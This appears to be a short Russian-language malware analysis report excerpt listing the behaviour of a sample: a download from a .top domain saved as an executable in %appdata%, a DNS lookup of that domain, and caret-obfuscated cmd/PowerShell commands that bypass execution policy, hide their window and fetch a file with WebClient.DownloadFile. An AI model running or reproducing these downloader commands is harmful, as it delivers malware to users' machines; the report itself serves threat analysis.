Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWE^R^shE^L^L.E^xE -ExEcuT^I^O^NP^oLICY ^BY^PA^sS ^-no^P^ROFi^lE -WIN^D^OW^sTYL^E ^HI^dD^E^n^ (^neW^-o^B^jECT syste^m^.^nET.W^E^bcLiENt).^D^O^Wn^l^o^a^D^FILe(^'http://hometo...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "pOWE^R^shE^L^L.E^xE -ExEcuT^I^O^NP^oLICY ^BY^PA^sS ^-no^P^ROFi^lE -WIN^D^OW^sTYL^E ^HI^dD^E^n^ (^neW^-o^B^jECT syste^m^.^nET.W^E^bcLiENt).^D^O^Wn^l^o^a^D^FILe(^'http://hometo...' (со скрытым окном)